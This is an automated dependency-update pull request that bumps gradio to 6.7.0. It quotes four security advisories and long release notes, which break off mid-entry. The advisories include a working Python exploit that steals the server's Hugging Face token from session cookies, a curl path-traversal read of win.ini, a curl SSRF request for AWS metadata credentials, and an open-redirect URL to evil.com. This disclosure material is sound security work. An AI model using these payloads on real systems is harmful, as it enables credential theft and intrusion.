chore(deps): update dependency gradio to v6 [security]

[renovate]

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package	Change	Age	Confidence
gradio	5.49.1 → 6.7.0

GitHub Vulnerability Alerts

CVE-2026-27167

Summary

Gradio applications running outside of Hugging Face Spaces automatically enable "mocked" OAuth routes when OAuth components (e.g. gr.LoginButton) are used. When a user visits /login/huggingface, the server retrieves its own Hugging Face access token via huggingface_hub.get_token() and stores it in the visitor's session cookie. If the application is network-accessible, any remote attacker can trigger this flow to steal the server owner's HF token. The session cookie is signed with a hardcoded secret derived from the string "-v4", making the payload trivially decodable.

Affected Component

gradio/oauth.py — functions attach_oauth(), _add_mocked_oauth_routes(), and _get_mocked_oauth_info().

Root Cause Analysis

1. Real token injected into every visitor's session

When Gradio detects it is not running inside a Hugging Face Space (get_space() is None), it registers mocked OAuth routes via _add_mocked_oauth_routes() (line 44).

The function _get_mocked_oauth_info() (line 307) calls huggingface_hub.get_token() to retrieve the real HF access token configured on the host machine (via HF_TOKEN environment variable or huggingface-cli login). This token is stored in a dict that is then injected into the session of any visitor who hits /login/callback (line 183):

request.session["oauth_info"] = mocked_oauth_info

The mocked_oauth_info dict contains the real token at key access_token (line 329):

return {
    "access_token": token,  # <-- real HF token from server
    ...
}

2. Hardcoded session signing secret

The SessionMiddleware secret is derived from OAUTH_CLIENT_SECRET (line 50):

session_secret = (OAUTH_CLIENT_SECRET or "") + "-v4"

When running outside a Space, OAUTH_CLIENT_SECRET is not set, so the secret becomes the constant string "-v4", hashed with SHA-256. Since this value is public (hardcoded in source code), any attacker can decode the session cookie payload without needing to break the signature.

In practice, Starlette's SessionMiddleware stores the session data as plaintext base64 in the cookie — the signature only provides integrity, not confidentiality. The token is readable by simply base64-decoding the cookie payload.

Attack Scenario

Prerequisites

• A Gradio app using OAuth components (gr.LoginButton, gr.OAuthProfile, etc.)
• The app is network-accessible (e.g. server_name="0.0.0.0", share=True, port forwarding, etc.)
• The host machine has a Hugging Face token configured
• OAUTH_CLIENT_SECRET is not set (default outside of Spaces)

Steps

1. Attacker sends a GET request to http://<target>:7860/login/huggingface
2. The server responds with a 307 redirect to /login/callback
3. The attacker follows the redirect; the server sets a session cookie containing the real HF token
4. The attacker base64-decodes the cookie payload (everything before the first .) to extract the access_token

Minimal Vulnerable Application

import gradio as gr
from huggingface_hub import login

login(token="hf_xxx...")

def hello(profile: gr.OAuthProfile | None) -> str:
    if profile is None:
        return "Not logged in."
    return f"Hello {profile.name}"

with gr.Blocks() as demo:
    gr.LoginButton()
    gr.Markdown().attach_load_event(hello, None)

demo.launch(server_name="0.0.0.0")

Proof of Concept

#!/usr/bin/env python3
"""
POC: Gradio mocked OAuth leaks server's HF token via session + weak secret
Usage: python exploit.py --target http://victim:7860
       python exploit.py --target http://victim:7860 --proxy http://127.0.0.1:8080
"""
import argparse
import base64
import json
import sys
import requests

def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--target", required=True, help="Base URL, e.g. http://host:7860")
    ap.add_argument("--proxy", default=None, help="HTTP proxy, e.g. http://127.0.0.1:8080")
    args = ap.parse_args()

    base = args.target.rstrip("/")
    proxies = {"http": args.proxy, "https": args.proxy} if args.proxy else None

    # 1. Trigger mocked OAuth flow — server injects its own HF token into our session
    s = requests.Session()
    s.get(f"{base}/login/huggingface", allow_redirects=True, verify=False, proxies=proxies)

    cookie = s.cookies.get("session")
    if not cookie:
        print("[-] No session cookie received; target may not be vulnerable.", file=sys.stderr)
        sys.exit(1)

    # 2. Decode the cookie payload (base64 before the first ".")
    payload_b64 = cookie.split(".")[0]
    payload_b64 += "=" * (-len(payload_b64) % 4)  # fix padding
    data = json.loads(base64.b64decode(payload_b64))
    token = data.get("oauth_info", {}).get("access_token")

    if token:
        print(f"[+] Leaked HF token: {token}")
    else:
        print("[-] No access_token found in session.", file=sys.stderr)
        sys.exit(1)

if __name__ == "__main__":
    main()

CVE-2026-28414

Summary

Gradio apps running on Window with Python 3.13+ are vulnerable to an absolute path traversal issue that enables unauthenticated attackers to read arbitrary files from the file system.

Details

Python 3.13+ changed the definition of os.path.isabs so that root-relative paths like /windows/win.ini on Windows are no longer considered absolute paths, resulting in a vulnerability in Gradio's logic for joining paths safely.

This can be exploited by unauthenticated attackers to read arbitrary files from the Gradio server, even when Gradio is set up with authentication.

PoC

% curl http://10.10.10.10:7860/static//windows/win.ini
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Impact

Arbitrary file read in the context of the Windows user running Gradio.

CVE-2026-28415

Summary

The _redirect_to_target() function in Gradio's OAuth flow accepts an unvalidated _target_url query parameter, allowing redirection to arbitrary external URLs. This affects the /logout and /login/callback endpoints on Gradio apps with OAuth enabled (i.e. apps running on Hugging Face Spaces with gr.LoginButton).

Details

  def _redirect_to_target(request, default_target="/"):
      target = request.query_params.get("_target_url", default_target)
      return RedirectResponse(target)  # No validation

An attacker can craft a URL like https://my-space.hf.space/logout?_target_url=https://evil.com/phishing that redirects the user to an external site after logout. Because the URL originates from a trusted hf.space domain, users are more likely to trust the link.

Impact

Phishing — an attacker can use the trusted domain to redirect users to a malicious site. No direct data exposure or server-side impact.

Fix

The _target_url parameter is now sanitized to only use the path, query, and fragment, stripping any scheme or host.

CVE-2026-28416

Summary

A Server-Side Request Forgery (SSRF) vulnerability in Gradio allows an attacker to make arbitrary HTTP requests from a victim's server by hosting a malicious Gradio Space. When a victim application uses gr.load() to load an attacker-controlled Space, the malicious proxy_url from the config is trusted and added to the allowlist, enabling the attacker to access internal services, cloud metadata endpoints, and private networks through the victim's infrastructure.

Details

The vulnerability exists in Gradio's config processing flow when loading external Spaces:

1. Config Fetching (gradio/external.py:630): gr.load() calls Blocks.from_config() which fetches and processes the remote Space's configuration.

2. Proxy URL Trust (gradio/blocks.py:1231-1233): The proxy_url from the untrusted config is added directly to self.proxy_urls:

   if config.get("proxy_url"):
       self.proxy_urls.add(config["proxy_url"])

3. Built-in Proxy Route (gradio/routes.py:1029-1031): Every Gradio app automatically exposes a /proxy={url_path} endpoint:

   @​router.get("/proxy={url_path:path}", dependencies=[Depends(login_check)])
   async def reverse_proxy(url_path: str):

4. Host-based Validation (gradio/routes.py:365-368): The validation only checks if the URL's host matches any trusted proxy_url host:

   is_safe_url = any(
       url.host == httpx.URL(root).host for root in self.blocks.proxy_urls
   )

An attacker can set proxy_url to http://169.254.169.254/ (AWS metadata) or any internal service, and the victim's server will proxy requests to those endpoints.

PoC

Full PoC: https://gist.github.com/logicx24/8d4c1aaa4e70f85d0d0fba06a463f2d6

1. Attacker creates a malicious Gradio Space that returns this config:

{
    "mode": "blocks",
    "components": [...],
    "proxy_url": "http://169.254.169.254/"  # AWS metadata endpoint
}

2. Victim loads the malicious Space:

import gradio as gr
demo = gr.load("attacker/malicious-space")
demo.launch(server_name="0.0.0.0", server_port=7860)

3. Attacker exploits the proxy:

# Fetch AWS credentials through victim's server
curl "http://victim:7860/gradio_api/proxy=http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name"

Impact

Who is impacted:

• Any Gradio application that uses gr.load() to load external/untrusted Spaces
• HuggingFace Spaces that compose or embed other Spaces
• Enterprise deployments where Gradio apps have access to internal networks

Attack scenarios:

• Cloud credential theft: Access AWS/GCP/Azure metadata endpoints to steal IAM credentials
• Internal service access: Reach databases, admin panels, and APIs on private networks
• Network reconnaissance: Map internal infrastructure through the victim
• Data exfiltration: Access sensitive internal APIs and services

---

Release Notes

gradio-app/gradio (gradio)

v6.7.0

Compare Source

Features

• #​12829 d720b25 - Allow :fastest :cheapest options when loading models. Thanks @​dawoodkhan82!
• #​12918 e29e1cc - Add Space-specific skill generation to gradio skills add. Thanks @​abidlabs!
• #​12929 978bc6e - Add server functions support to gr.HTML. Thanks @​aliabid94!
• #​12917 a0fff5c - Add push_to_hub method to gr.HTML. Add a gallery to view notable custom HTML components. Thanks @​freddyaboulton!
• #​12899 820eff0 - Add support for gr.HTML as a layout element. Thanks @​aliabid94!
• #​12900 d6907ac - add SKILLS.md to Gradio repo, part 1 + cleanup. Thanks @​abidlabs!
• #​12907 3e625a0 - Better error handling when connection to server is lost. Thanks @​abidlabs!

Fixes

• #​12911 dcfc429 - Fix Button component ignoring the scale parameter. Thanks @​hztBUAA!
• #​12925 ccff8b8 - Walkthrough Selected Bug. Thanks @​freddyaboulton!
• #​12890 ac29df8 - fix DataFrame NaN values becoming 0 after sorting. Thanks @​Mr-Neutr0n!
• #​12926 6011b00 - Fix absolute path issue in Windows. Thanks @​freddyaboulton!
• #​12904 7c3fa2a - Fix Loading Spinner Issue Caused by Events Targeting Components In Inactive Tabs. Thanks @​freddyaboulton!
• #​12903 57707c7 - Fix Tab i18n issue. Thanks @​freddyaboulton!
• #​12901 1387fc6 - Fix unload event bug. Thanks @​freddyaboulton!
• #​12906 81482b5 - Lazy load sub-tab and accordion components. Thanks @​dawoodkhan82!

v6.6.0

Compare Source

Features

• #​12839 1c671b3 - Hide forms with no elements. Thanks @​aliabid94!
• #​12700 b01c95a - Rewrite behavior section of docs. Thanks @​aliabd!

Fixes

• #​12875 d0b3422 - Fix stop button not switching back to submit button in chat interface. Thanks @​freddyaboulton!
• #​12797 6a0c6ea - Refactor translation logic. Thanks @​hannahblair!
• #​12877 ebbd242 - Ensure disconnected toast text is visible. Thanks @​hannahblair!
• #​12873 6533d38 - Fix stop button not working in Audio streaming. Thanks @​hysts!
• #​12862 a8e6b7b - Fix ColorPicker not firing focus, blur, or submit events after Svelte 5 migration. Thanks @​veeceey!
• #​12865 db7ab39 - Fix Gallery fullscreen button not working in preview mode. Thanks @​veeceey!
• #​12866 9810396 - Fix Gallery preview=True parameter not working on initial load. Thanks @​veeceey!
• #​12894 e0cd4ca - Fix load examples bug in spa. Thanks @​freddyaboulton!
• #​12830 a2a0078 - Video to Svelte 5. Thanks @​dawoodkhan82!
• #​12882 fc7c01e - Validate proxy url host. Thanks @​freddyaboulton!
• #​12874 b10e17c - fix(reloading): Re-assign config for SpacesReloader. Thanks @​cbensimon!
• #​12884 dfee0da - Oauth fixes. Thanks @​freddyaboulton!
• #​12811 8f8cef8 - Fix windows tests. Thanks @​freddyaboulton!
• #​12846 226daba - Fix bug where children of accordions dont get rendered when they are opened programmatically. Thanks @​freddyaboulton!
• #​12887 c006778 - Fix AttributeError in ColoredCheckboxGroup.api_info(). Thanks @​hysts!

v6.5.1

Compare Source

Fixes

• #​12840 26cea7a - Ensure change event fires when slider value changes to 0. Thanks @​hannahblair!
• #​12845 0eac164 - [Hotfix] add pytz to requirements. Thanks @​RektPunk!

v6.5.0

Compare Source

Features

• #​12804 fc366b4 - Allow webcam uploads and clipboard paste for gallery. Thanks @​freddyaboulton!
• #​12834 ddbb6a9 - Allow pandas version 3. Thanks @​freddyaboulton!

Fixes

• #​12818 6594c9c - Migrate Dataset to Svelte 5. Thanks @​freddyaboulton!
• #​12828 151cbd1 - Fix private spaces. Thanks @​freddyaboulton!
• #​12835 5ecf6d2 - Fix CSS root in spaces. Thanks @​freddyaboulton!
• #​12813 99caae6 - Migrate StatusTracker to Svelte 5. Thanks @​freddyaboulton!
• #​12810 7ed6dfa - Migrate js/fileexplorer to svelte5. Thanks @​aliabid94!
• #​12789 af5e86f - Migrate gr.MultimodalTextbox. Thanks @​hannahblair!
• #​12809 8409b7a - Migrate js/code. Thanks @​aliabid94!
• #​12817 05acc66 - Fix Login. Thanks @​freddyaboulton!

v6.4.0

Compare Source

Features

• #​12808 d035856 - Fixes gr.JSON lines. Thanks @​aliabid94!
• #​12785 f04abc3 - Refactor gr.HighlightedText. Thanks @​hannahblair!
• #​12801 07c5280 - Add axis_format parameters for native plots, and fix SSR mode. Thanks @​abidlabs!
• #​12778 263c065 - Migrate js/json to svelte5. Thanks @​aliabid94!
• #​12785 f04abc3 - Allow transparent and undefined labels in gr.HighlightedText. Thanks @​hannahblair!

Fixes

• #​12794 0954db4 - Fix Dependency docs. Thanks @​aliabd!
• #​12800 7a1c321 - Bump svelte/kit for security reasons. Thanks @​freddyaboulton!
• #​12770 3115258 - Remove textbox scrollbar if value is empty. Thanks @​freddyaboulton!
• #​12698 db86165 - Migrates gr.File. Thanks @​aliabid94!
• #​12806 3b3b035 - Fix Gallery upload after it has been populated. Thanks @​freddyaboulton!
• #​12696 eb13299 - migrate datetime. Thanks @​aliabid94!
• #​12796 c833708 - Fix label in gr.HTML. Thanks @​hannahblair!
• #​12630 44817db - fix(website): improve Event Listeners table dark mode readability. Thanks @​DanielDerefaka!
• #​12758 fb4b92a - Add volume control to gr.Video. Thanks @​hysts!
• #​12761 2afffc2 - Migrate ParamTable syntax to svelte 5. Thanks @​freddyaboulton!
• #​12807 4ce4159 - Fix DeepLink Bug. Thanks @​freddyaboulton!
• #​12757 6d9c2d7 - Migrate Textbox to Svelte 5. Thanks @​dawoodkhan82!
• #​12774 f02c58e - Prevent empty button wrappers from rendering in gr.Chatbot. Thanks @​hannahblair!
• #​12779 ea2d3e9 - Migrate Audio + Upload + Atoms to Svelte 5. Thanks @​dawoodkhan82!
• #​12791 7f2cf84 - Add better related guides section to docs. Thanks @​aliabd!
• #​12596 5f654d7 - Ensure HTML renders in gr.Chatbot. Thanks @​hannahblair!
• #​12607 299728b - fix: add ARIA landmarks for accessibility. Thanks @​majiayu000!
• #​12772 31cf0a6 - Fix custom button click event triggers in dropdown. Thanks @​freddyaboulton!
• #​12769 976cd11 - Fix html in Multiselect component. Thanks @​freddyaboulton!
• #​12684 1373713 - Migrate Gallery to Svelte 5. Thanks @​freddyaboulton!
• #​12693 b48da51 - Fix bug where Walkthrough Component Freezes. Thanks @​freddyaboulton!
• #​12767 a52be3f - Hide footer links when set to empty. Thanks @​hannahblair!
• #​12771 404f6a5 - Migrate Markdown components to svelte 5. Thanks @​freddyaboulton!
• #​12697 c471e96 - Migrates dropdown. Thanks @​aliabid94!
• #​12795 184968a - Add fade effect to overflowing text. Thanks @​hannahblair!
• #​12637 e202750 - Fix bug where UploadProgress initializes with a null upload_id. Thanks @​freddyaboulton!
• #​12773 6edcea5 - Fix dev mode. Thanks @​pngwn!
• #​12805 f4a14e7 - Restore padding param in gr.HTML. Thanks @​hannahblair!
• #​12472 9a2bc0d - Re-enable SSR mode. Thanks @​pngwn!
• #​12777 65f94fb - Fix markdown migration. Thanks @​aliabid94!
• #​12776 c2be5a2 - Migrate js/label to svelte5. Thanks @​aliabid94!
• #​12594 c2f0f19 - add conditional rendering for the upload button in multimodal textbox. Thanks @​hannahblair!
• #​12784 565f07f - Fix gr.Textbox auto-resize regression when lines=1. Thanks @​hysts!
• #​12782 8a262d6 - Migrate UploadButton. Thanks @​freddyaboulton!
• #​12775 e023cac - Restore gr.Textbox resize listener. Thanks @​hannahblair!

v6.3.0

Compare Source

Features

• #​12680 c99a50b - Add .input() to Video. Thanks @​hysts!
• #​12762 51b7010 - pollen css fix. Thanks @​dawoodkhan82!
• #​12756 2b4176c - Migrate Sidebar to Svelte 5. Thanks @​dawoodkhan82!
• #​12677 6f37743 - Make check for active page in navbar robust. Thanks @​abidlabs!

Fixes

• #​12614 6222192 - fix(client): make WebP and VTT MIME type detection case-insensitive. Thanks @​majiayu000!
• #​12688 5206d47 - Migrate Model3D to Svelte 5. Thanks @​dawoodkhan82!
• #​12686 aa362c4 - Allow static files when handling events. Thanks @​hannahblair!
• #​12626 3a39ee4 - Fix Bug Where Invisible Columns Take Up Space. Thanks @​aliabid94!
• #​12605 48f580b - fix: Fix Textbox white background in dark mode. Thanks @​Godkunn!
• #​12608 ab20c59 - feat(client): add generic type parameter to predict() method. Thanks @​majiayu000!
• #​12689 be89f8c - Migrate DownloadButton to Svelte 5. Thanks @​dawoodkhan82!
• #​12675 3aee8ae - Allow multiple file messages to be displayed in Chatbot. Thanks @​freddyaboulton!
• #​12695 6eadb5b - Migrate accordion to svelte 5. Thanks @​aliabid94!
• #​12692 3b3eaf0 - Restore RTL prop to gradio components. Thanks @​hannahblair!
• #​12636 3194f29 - Fix docs for Tab select event. Thanks @​freddyaboulton!
• #​12681 ba46c2d - Migrate Button to Svelte 5. Thanks @​freddyaboulton!
• #​12627 fa75712 - Add custom buttons to gr.Dropdown(multiselect=True) and gr.LinePlot and other native plots. Thanks @​abidlabs!
• #​12606 6a80a07 - fix: support gr.update() for gr.State + update api_visibility docs. Thanks @​majiayu000!
• #​12625 7fb79d4 - Fix bug where tabs don't work inside gr.render. Thanks @​freddyaboulton!
• #​12676 57dd086 - Upgrade color picker to Svelte 5 syntax. Thanks @​freddyaboulton!
• #​12601 5fae6b7 - Fix Infinite Change Event in Browser History. Thanks @​freddyaboulton!

v6.2.0

Compare Source

Features

• #​12539 f1d83fa - Add ability to add custom buttons to components. Thanks @​abidlabs!
• #​12582 fac3844 - Upgrade ty to 0.0.2. Thanks @​abidlabs!
• #​12598 c06ded8 - Relax version of pydantic dependency in base gradio. Thanks @​abidlabs!
• #​12537 f753b0c - Add .select() and .input() events to gr.FileExplorer. Thanks @​abidlabs!

Fixes

• #​12550 efb2549 - Fix Dataframe Package. Thanks @​dawoodkhan82!
• #​12547 81b7960 - Add error handling to gr.JSON. Thanks @​hannahblair!
• #​12592 2119a24 - Fix custom gr.HTML updates. Thanks @​aliabid94!
• #​12599 184c596 - Two bugs for gr.HTML. Thanks @​aliabid94!
• #​12585 1724a02 - Remove checkmark from windows. Thanks @​freddyaboulton!
• #​12549 e2c316d - Fix Hot Reload of Custom CSS. Thanks @​freddyaboulton!
• #​12569 9daf193 - Add footer to bottom of page. Thanks @​freddyaboulton!
• #​12577 b4c00d2 - Fix Gallery preview_close event not firing on ESC key. Thanks @​majiayu000!
• #​12558 6d46ddb - feat: cache NodeJS proxied requests. Thanks @​cbensimon!
• #​12584 cf27938 - Fix issue with HTML status shading even when "show_progress='hidden'". Thanks @​abidlabs!
• #​12572 5cf1ae5 - Fix Dropdown change event when allow_custom_value is true. Thanks @​freddyaboulton!
• #​12556 b3a3683 - Use a slower check rate on windows, otherwise windows locks up. Thanks @​freddyaboulton!
• #​12580 b27e2cb - Audio Trim Fix. Thanks @​dawoodkhan82!
• #​12565 b4c69af - Fix Plot display in chatbot. Thanks @​freddyaboulton!
• #​12536 653f47b - Fix Theme Builder Function. Thanks @​freddyaboulton!
• #​12578 1fa29ff - Fix AttributeError for proxy_url in get_config. Thanks @​majiayu000!
• #​12600 1fafaba - Add x-gradio-user-header. Thanks @​freddyaboulton!
• #​12575 7498fac - Fix image buttons default value. Thanks @​freddyaboulton!

v6.1.0

Compare Source

Features

• #​12504 4476400 - Add playback_position to gr.Audio and gr.Video, which can be updated and read. Thanks @​aliabid94!
• #​12524 d6be33e - feat: add link_target parameter to Button component. Thanks @​ujjwaltwri!
• #​12502 d3966ca - Restore Blocks constructor args deprecated in 6.0 (theme, css, etc.). Thanks @​aliabid94!

Fixes

• #​12515 0892c29 - Fix plot Rendering + visibility bug. Thanks @​freddyaboulton!
• #​12493 8a6cff6 - Fix bug where cancelling an events shows an error in the UI. Thanks @​freddyaboulton!
• #​12518 e8efab2 - Fix Settings. Thanks @​freddyaboulton!
• #​12494 251add4 - JS unit test fix. Thanks @​dawoodkhan82!
• #​12491 4f6327b - Load visible components in 6.0. Thanks @​freddyaboulton!
• #​12508 0715279 - Fix custom js param. Thanks @​dawoodkhan82!
• #​12531 8aaa209 - Allow custom HTML components to be defined in jupyter notebooks. Thanks @​abidlabs!
• #​12499 af3ffa0 - Fix: avoid corrupting JSON-like values in CSV sanitization. Thanks @​ujjwaltwri!
• #​12516 23c9bb5 - Fix copy button in gr.Textbox. Thanks @​dawoodkhan82!

v6.0.2

Compare Source

Features

• #​12475 c4c36c7 - Fix highlighted text in 6.0. Thanks @​freddyaboulton!
• #​12476 4e9a330 - Fix slider css issue. Thanks @​freddyaboulton!

Fixes

• #​12480 b9732d1 - [BUGFIX] Fix stream file download in gradio client. Thanks @​frascuchon!
• #​12490 472e164 - Make client backwards compatible with version 5. Thanks @​freddyaboulton!
• #​12489 2a2dd60 - 12485 fix mcp client issue. Thanks @​freddyaboulton!
• #​12477 07fa494 - Checkbox Label Fix. Thanks @​dawoodkhan82!

v6.0.1

Compare Source

Features

• #​12445 0f2fa10 - chore(deps): ⬆️ update pillow from 11.1.0 to 12.0. Thanks @​onuralpszr!
• #​12446 96efaab - Update gradio_client version to 2.0.0. Thanks @​abidlabs!

Fixes

• #​12460 f9e272d - Fix bug where close method does not kill the thread. Thanks [@​fred

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.